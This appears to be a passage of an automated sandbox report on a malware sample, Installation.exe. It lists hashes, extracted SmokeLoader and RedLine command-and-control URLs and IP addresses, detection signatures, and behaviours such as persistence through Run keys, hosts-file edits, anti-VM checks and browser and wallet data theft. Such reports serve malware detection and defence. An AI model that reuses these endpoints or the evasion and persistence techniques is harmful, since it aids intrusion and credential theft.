Analysis
-
max time kernel
1803s -
max time network
1805s -
platform
windows11_x64 -
resource
win11 -
submitted
16-08-2021 10:04
Static task
static1
Behavioral task
behavioral1
Sample
Installation.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Installation.exe
Resource
win11
Behavioral task
behavioral3
Sample
Installation.exe
Resource
win10v20210408
General
-
Target
Installation.exe
-
Size
631KB
-
MD5
cbafd60beffb18c666ff85f1517a76f9
-
SHA1
9e015cba7168b610969bfc299a4ffe4763f4fd5f
-
SHA256
d31f2d2d991acee74d9be732c8180f37cea12aceaba324804fbcf2d0d2891a3d
-
SHA512
ba61ac5f49827b0fba2c72f4b19540b91f8bceb8b441a713b7de00317059955ad592c88af8f9c94093077503ab3b4c4c522b0e577599ca5020ad1b0f254066ce
Malware Config
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted
redline
installs3
65.21.228.92:46802
Extracted
redline
1
37.0.8.88:65442
Extracted
redline
ls3
ganedokhot.xyz:80
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4668-367-0x00000000014F0000-0x0000000001E16000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerUNdlL32.eXerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6124 4780 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2884 4780 rUNdlL32.eXe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2532 4780 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 10 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\QtaJGwHPddqgej6FX70BDYa9.exe family_redline C:\Users\Admin\Documents\7zjNlw_VPADMMitd8gFCCZA1.exe family_redline C:\Users\Admin\Documents\QtaJGwHPddqgej6FX70BDYa9.exe family_redline C:\Users\Admin\Documents\7zjNlw_VPADMMitd8gFCCZA1.exe family_redline behavioral2/memory/2116-305-0x000002186B650000-0x000002186B669000-memory.dmp family_redline behavioral2/memory/5672-321-0x0000000000400000-0x0000000000446000-memory.dmp family_redline behavioral2/memory/5624-318-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral2/memory/5624-311-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/5672-316-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/4112-391-0x0000000000000000-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 14 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exetaskkill.exedescription pid process target process PID 5396 created 1632 5396 WerFault.exe RTqQYcYpcB8ukNlxo66LwG9g.exe PID 5424 created 2396 5424 WerFault.exe rnMygaJY9bsTe76aVZpyXwUC.exe PID 5444 created 1328 5444 WerFault.exe 5vMgVG9zA4l9mWyov7brGSyH.exe PID 5660 created 3192 5660 WerFault.exe Jc4yVtEOotyL__khOXuqTI3o.exe PID 5708 created 1436 5708 WerFault.exe EsxhG3_gIGbvwAFN8myBZi8b.exe PID 1544 created 4668 1544 WerFault.exe Q1Ao_fBAsTY9AXieWLrh4ZmG.exe PID 2328 created 4252 2328 WerFault.exe rundll32.exe PID 5048 created 2564 5048 WerFault.exe MsiExec.exe PID 3172 created 4468 3172 WerFault.exe askinstall53.exe PID 7120 created 6312 7120 WerFault.exe rundll32.exe PID 5448 created 6212 5448 WerFault.exe 9D1E.exe PID 2980 created 6760 2980 WerFault.exe explorer.exe PID 7116 created 1996 7116 WerFault.exe 4391711.exe PID 6444 created 6112 6444 taskkill.exe 8046740.exe -
Processes:
resource yara_rule C:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exe evasion C:\Users\Admin\Documents\fvYN9hKmk9UGZV9RxKdwgODO.exe evasion C:\Users\Admin\Documents\fvYN9hKmk9UGZV9RxKdwgODO.exe evasion C:\Users\Admin\Documents\5Mp1TdghewUnofPglzyG2WAq.exe evasion C:\Users\Admin\Documents\5Mp1TdghewUnofPglzyG2WAq.exe evasion C:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exe evasion behavioral2/memory/4668-367-0x00000000014F0000-0x0000000001E16000-memory.dmp evasion -
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
-
suricata: ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz
suricata: ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Nirsoft 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\11111.exe Nirsoft -
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2396-219-0x0000000004920000-0x00000000049BD000-memory.dmp family_vidar -
Blocklisted process makes network request 8 IoCs
Processes:
MsiExec.exepowershell.exeflow pid process 154 2564 MsiExec.exe 156 2564 MsiExec.exe 158 2564 MsiExec.exe 159 2564 MsiExec.exe 160 2564 MsiExec.exe 164 2564 MsiExec.exe 272 6056 powershell.exe 273 6056 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
rJDFkFv9mmHHWASOw8beydwV.exe3377047_logo_media.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts rJDFkFv9mmHHWASOw8beydwV.exe File opened for modification C:\Windows\system32\drivers\etc\hosts 3377047_logo_media.exe -
Executes dropped EXE 64 IoCs
Processes:
giF6kyVuHkhMBN_DFw4d_fQJ.exeB_v7FbFMaCVtguWH_z__hkT1.exeQtaJGwHPddqgej6FX70BDYa9.exe1z1s63Py6Cqed7KrMAeFLiN2.exefvYN9hKmk9UGZV9RxKdwgODO.exe7zjNlw_VPADMMitd8gFCCZA1.exe35SM90SrdCDhcnMYcnmUgvQl.exe5Mp1TdghewUnofPglzyG2WAq.exec7KFBhJ4C17IfmS3rpbMCPnF.exe7JRNCYc9Q4d4F6qCkPC_NHYW.exeZ2gmdquIX3wKlYS1tpRskviY.exeRTqQYcYpcB8ukNlxo66LwG9g.exen6cHDpHKzQsbua1IL51TbmFA.exeJc4yVtEOotyL__khOXuqTI3o.exeKcI_K2fAIjh0nUxCOwxYf0dW.exeQ1Ao_fBAsTY9AXieWLrh4ZmG.exernMygaJY9bsTe76aVZpyXwUC.exef2Ahm4zYweQaGU_apxXy4wJA.exeMcBIlPMIcehCj1VhnlSA1XBu.exerJDFkFv9mmHHWASOw8beydwV.exe5vMgVG9zA4l9mWyov7brGSyH.exeEsxhG3_gIGbvwAFN8myBZi8b.exe35SM90SrdCDhcnMYcnmUgvQl.execustomer3.exemd8_8eus.exegw4IdvE5G_HLuaXzgZeN_Zqp.exe1z1s63Py6Cqed7KrMAeFLiN2.exejooyu.exekDEcdwOxWvP_PYOYppAsUgAi.exe11111.exegiF6kyVuHkhMBN_DFw4d_fQJ.exefvYN9hKmk9UGZV9RxKdwgODO.exe5Mp1TdghewUnofPglzyG2WAq.exe7JRNCYc9Q4d4F6qCkPC_NHYW.exeKcI_K2fAIjh0nUxCOwxYf0dW.exeConhost.exe7JRNCYc9Q4d4F6qCkPC_NHYW.exe1292224.exe4415806.exe11111.exe11111.exe11111.exe7JRNCYc9Q4d4F6qCkPC_NHYW.exe11111.exe11111.exejfiag3g_gg.exe11111.exeConhost.exe22222.exeConhost.exeCleaner Installation.exeVersiumresearch.exe22222.exeMediaBurner2.exenote8876.exezhangfei.exeaskinstall53.exeGameBoxWin64.exeMediaBurner2.tmpWeather Installation.exe4391711.exemsiexec.exe7209319.exe3377047_logo_media.exepid process 1416 giF6kyVuHkhMBN_DFw4d_fQJ.exe 1476 B_v7FbFMaCVtguWH_z__hkT1.exe 1332 QtaJGwHPddqgej6FX70BDYa9.exe 1212 1z1s63Py6Cqed7KrMAeFLiN2.exe 1648 fvYN9hKmk9UGZV9RxKdwgODO.exe 1684 7zjNlw_VPADMMitd8gFCCZA1.exe 1760 35SM90SrdCDhcnMYcnmUgvQl.exe 1848 5Mp1TdghewUnofPglzyG2WAq.exe 1856 c7KFBhJ4C17IfmS3rpbMCPnF.exe 1940 7JRNCYc9Q4d4F6qCkPC_NHYW.exe 2116 Z2gmdquIX3wKlYS1tpRskviY.exe 1632 RTqQYcYpcB8ukNlxo66LwG9g.exe 2080 n6cHDpHKzQsbua1IL51TbmFA.exe 3192 Jc4yVtEOotyL__khOXuqTI3o.exe 3464 KcI_K2fAIjh0nUxCOwxYf0dW.exe 4668 Q1Ao_fBAsTY9AXieWLrh4ZmG.exe 2396 rnMygaJY9bsTe76aVZpyXwUC.exe 4856 f2Ahm4zYweQaGU_apxXy4wJA.exe 3764 McBIlPMIcehCj1VhnlSA1XBu.exe 2524 rJDFkFv9mmHHWASOw8beydwV.exe 1328 5vMgVG9zA4l9mWyov7brGSyH.exe 1436 EsxhG3_gIGbvwAFN8myBZi8b.exe 5516 35SM90SrdCDhcnMYcnmUgvQl.exe 5732 customer3.exe 5816 md8_8eus.exe 5776 gw4IdvE5G_HLuaXzgZeN_Zqp.exe 5752 1z1s63Py6Cqed7KrMAeFLiN2.exe 5932 jooyu.exe 5760 kDEcdwOxWvP_PYOYppAsUgAi.exe 1480 11111.exe 2992 giF6kyVuHkhMBN_DFw4d_fQJ.exe 5624 fvYN9hKmk9UGZV9RxKdwgODO.exe 5672 5Mp1TdghewUnofPglzyG2WAq.exe 784 7JRNCYc9Q4d4F6qCkPC_NHYW.exe 3440 KcI_K2fAIjh0nUxCOwxYf0dW.exe 5856 Conhost.exe 4476 7JRNCYc9Q4d4F6qCkPC_NHYW.exe 5392 1292224.exe 5612 4415806.exe 1012 11111.exe 1532 11111.exe 4020 11111.exe 4112 7JRNCYc9Q4d4F6qCkPC_NHYW.exe 5860 11111.exe 936 11111.exe 1572 jfiag3g_gg.exe 1488 11111.exe 5616 Conhost.exe 5376 22222.exe 1144 Conhost.exe 3912 Cleaner Installation.exe 5560 Versiumresearch.exe 4208 22222.exe 4012 MediaBurner2.exe 5684 note8876.exe 6024 zhangfei.exe 4468 askinstall53.exe 4452 GameBoxWin64.exe 5912 MediaBurner2.tmp 5084 Weather Installation.exe 1996 4391711.exe 3124 msiexec.exe 1052 7209319.exe 724 3377047_logo_media.exe -
Processes:
resource yara_rule C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe vmprotect C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe vmprotect behavioral2/memory/5816-282-0x0000000000400000-0x000000000067D000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
82ED.exe930B.exeQtaJGwHPddqgej6FX70BDYa9.exe7zjNlw_VPADMMitd8gFCCZA1.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 82ED.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 82ED.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 930B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 930B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion QtaJGwHPddqgej6FX70BDYa9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion QtaJGwHPddqgej6FX70BDYa9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7zjNlw_VPADMMitd8gFCCZA1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7zjNlw_VPADMMitd8gFCCZA1.exe -
Drops startup file 2 IoCs
Processes:
customer3.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe customer3.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe customer3.exe -
Loads dropped DLL 64 IoCs
Processes:
Z2gmdquIX3wKlYS1tpRskviY.exegw4IdvE5G_HLuaXzgZeN_Zqp.exeKcI_K2fAIjh0nUxCOwxYf0dW.exerundll32.exeCleaner Installation.exeMediaBurner2.tmpGameBoxWin64.exeWeather Installation.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeinstaller.exeMsiExec.exerundll32.exeWeather_Installation.exeWeather.exeWeather.exeWeather.exeWeather.exeWeather.exepid process 2116 Z2gmdquIX3wKlYS1tpRskviY.exe 5776 gw4IdvE5G_HLuaXzgZeN_Zqp.exe 3440 KcI_K2fAIjh0nUxCOwxYf0dW.exe 3440 KcI_K2fAIjh0nUxCOwxYf0dW.exe 5776 gw4IdvE5G_HLuaXzgZeN_Zqp.exe 4252 rundll32.exe 3912 Cleaner Installation.exe 5912 MediaBurner2.tmp 4452 GameBoxWin64.exe 4452 GameBoxWin64.exe 5084 Weather Installation.exe 2564 MsiExec.exe 4452 GameBoxWin64.exe 5628 MsiExec.exe 5628 MsiExec.exe 2180 MsiExec.exe 2180 MsiExec.exe 4460 MsiExec.exe 2180 MsiExec.exe 4460 MsiExec.exe 2564 MsiExec.exe 2564 MsiExec.exe 2564 MsiExec.exe 2564 MsiExec.exe 2564 MsiExec.exe 5776 gw4IdvE5G_HLuaXzgZeN_Zqp.exe 5776 gw4IdvE5G_HLuaXzgZeN_Zqp.exe 2564 MsiExec.exe 2564 MsiExec.exe 2564 MsiExec.exe 2564 MsiExec.exe 5776 gw4IdvE5G_HLuaXzgZeN_Zqp.exe 2564 MsiExec.exe 5776 gw4IdvE5G_HLuaXzgZeN_Zqp.exe 6824 installer.exe 6824 installer.exe 6824 installer.exe 5512 MsiExec.exe 5512 MsiExec.exe 5776 gw4IdvE5G_HLuaXzgZeN_Zqp.exe 6312 rundll32.exe 5776 gw4IdvE5G_HLuaXzgZeN_Zqp.exe 5776 gw4IdvE5G_HLuaXzgZeN_Zqp.exe 5776 gw4IdvE5G_HLuaXzgZeN_Zqp.exe 5696 Weather_Installation.exe 5696 Weather_Installation.exe 5696 Weather_Installation.exe 5696 Weather_Installation.exe 5696 Weather_Installation.exe 5520 Weather.exe 5696 Weather_Installation.exe 5696 Weather_Installation.exe 5520 Weather.exe 5520 Weather.exe 6100 Weather.exe 2092 Weather.exe 6068 Weather.exe 2092 Weather.exe 2092 Weather.exe 6068 Weather.exe 6068 Weather.exe 2092 Weather.exe 1320 Weather.exe 1320 Weather.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Documents\QtaJGwHPddqgej6FX70BDYa9.exe themida C:\Users\Admin\Documents\7zjNlw_VPADMMitd8gFCCZA1.exe themida C:\Users\Admin\Documents\QtaJGwHPddqgej6FX70BDYa9.exe themida C:\Users\Admin\Documents\7zjNlw_VPADMMitd8gFCCZA1.exe themida behavioral2/memory/1332-313-0x00000000001D0000-0x00000000001D1000-memory.dmp themida behavioral2/memory/1684-317-0x00000000009C0000-0x00000000009C1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
Processes:
msedge.exemsedge.exeWeather_Installation.exeaipackagechainer.exemsiexec.exe3377047_logo_media.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Weather_Installation.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Weather = "C:\\Users\\Admin\\AppData\\Roaming\\Weather\\Weather.exe --PH33" Weather_Installation.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\Taetehohaby.exe\"" 3377047_logo_media.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
930B.exeQtaJGwHPddqgej6FX70BDYa9.exe7zjNlw_VPADMMitd8gFCCZA1.exemd8_8eus.exenote8876.exe82ED.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 930B.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA QtaJGwHPddqgej6FX70BDYa9.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7zjNlw_VPADMMitd8gFCCZA1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA note8876.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 82ED.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
GameBoxWin64.exemsiexec.exeinstaller.exeWeather Installation.exeCleaner Installation.exedescription ioc process File opened (read-only) \??\P: GameBoxWin64.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\G: Weather Installation.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\K: Cleaner Installation.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\O: GameBoxWin64.exe File opened (read-only) \??\Q: GameBoxWin64.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\Z: GameBoxWin64.exe File opened (read-only) \??\A: Weather Installation.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\I: GameBoxWin64.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: Cleaner Installation.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\P: Weather Installation.exe File opened (read-only) \??\Y: Weather Installation.exe File opened (read-only) \??\Z: Weather Installation.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\S: Cleaner Installation.exe File opened (read-only) \??\A: GameBoxWin64.exe File opened (read-only) \??\V: GameBoxWin64.exe File opened (read-only) \??\Y: GameBoxWin64.exe File opened (read-only) \??\I: Weather Installation.exe File opened (read-only) \??\V: Cleaner Installation.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\Q: Weather Installation.exe File opened (read-only) \??\F: Weather Installation.exe File opened (read-only) \??\O: Weather Installation.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: Cleaner Installation.exe File opened (read-only) \??\F: Cleaner Installation.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\J: Weather Installation.exe File opened (read-only) \??\X: Weather Installation.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\W: Cleaner Installation.exe File opened (read-only) \??\U: GameBoxWin64.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\G: Cleaner Installation.exe File opened (read-only) \??\E: Cleaner Installation.exe File opened (read-only) \??\N: Cleaner Installation.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: Cleaner Installation.exe File opened (read-only) \??\J: GameBoxWin64.exe File opened (read-only) \??\K: GameBoxWin64.exe File opened (read-only) \??\S: GameBoxWin64.exe File opened (read-only) \??\L: Weather Installation.exe File opened (read-only) \??\T: Weather Installation.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\I: installer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 ipinfo.io 34 ip-api.com 35 ip-api.com 49 ipinfo.io 99 ipinfo.io 2 ipinfo.io -
Drops file in System32 directory 4 IoCs
Processes:
rundll32.exedescription ioc process File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
QtaJGwHPddqgej6FX70BDYa9.exe7zjNlw_VPADMMitd8gFCCZA1.exe82ED.exe930B.exepid process 1332 QtaJGwHPddqgej6FX70BDYa9.exe 1684 7zjNlw_VPADMMitd8gFCCZA1.exe 232 82ED.exe 3700 930B.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
35SM90SrdCDhcnMYcnmUgvQl.exe1z1s63Py6Cqed7KrMAeFLiN2.exefvYN9hKmk9UGZV9RxKdwgODO.exe5Mp1TdghewUnofPglzyG2WAq.exe7JRNCYc9Q4d4F6qCkPC_NHYW.exeConhost.exeKcI_K2fAIjh0nUxCOwxYf0dW.exerJDFkFv9mmHHWASOw8beydwV.exedescription pid process target process PID 1760 set thread context of 5516 1760 35SM90SrdCDhcnMYcnmUgvQl.exe 35SM90SrdCDhcnMYcnmUgvQl.exe PID 1212 set thread context of 5752 1212 1z1s63Py6Cqed7KrMAeFLiN2.exe 1z1s63Py6Cqed7KrMAeFLiN2.exe PID 1648 set thread context of 5624 1648 fvYN9hKmk9UGZV9RxKdwgODO.exe fvYN9hKmk9UGZV9RxKdwgODO.exe PID 1848 set thread context of 5672 1848 5Mp1TdghewUnofPglzyG2WAq.exe 5Mp1TdghewUnofPglzyG2WAq.exe PID 1940 set thread context of 4112 1940 7JRNCYc9Q4d4F6qCkPC_NHYW.exe 7JRNCYc9Q4d4F6qCkPC_NHYW.exe PID 1144 set thread context of 4552 1144 Conhost.exe GameBox64bit.exe PID 3464 set thread context of 3440 3464 KcI_K2fAIjh0nUxCOwxYf0dW.exe KcI_K2fAIjh0nUxCOwxYf0dW.exe PID 2524 set thread context of 6676 2524 rJDFkFv9mmHHWASOw8beydwV.exe rJDFkFv9mmHHWASOw8beydwV.exe -
Drops file in Program Files directory 64 IoCs
Processes:
gw4IdvE5G_HLuaXzgZeN_Zqp.exeConhost.exe3377047_logo_media.exedata_load.exenote8876.exeultramediaburner.tmpdescription ioc process File created C:\Program Files (x86)\temp_files gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\view.html gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_mms_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe Conhost.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\simplexml.luac gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\2 gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\twitch.luac gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libnetsync_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libflacsys_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_vc1_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files\Windows Defender\VKNWWJTJZS\ultramediaburner.exe.config 3377047_logo_media.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\soundcloud.luac gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libaudiobargraph_v_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File opened for modification C:\Program Files\temp_files\itLdAUYMscN.dll data_load.exe File created C:\Program Files (x86)\lighteningplayer\data_load.exe gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created 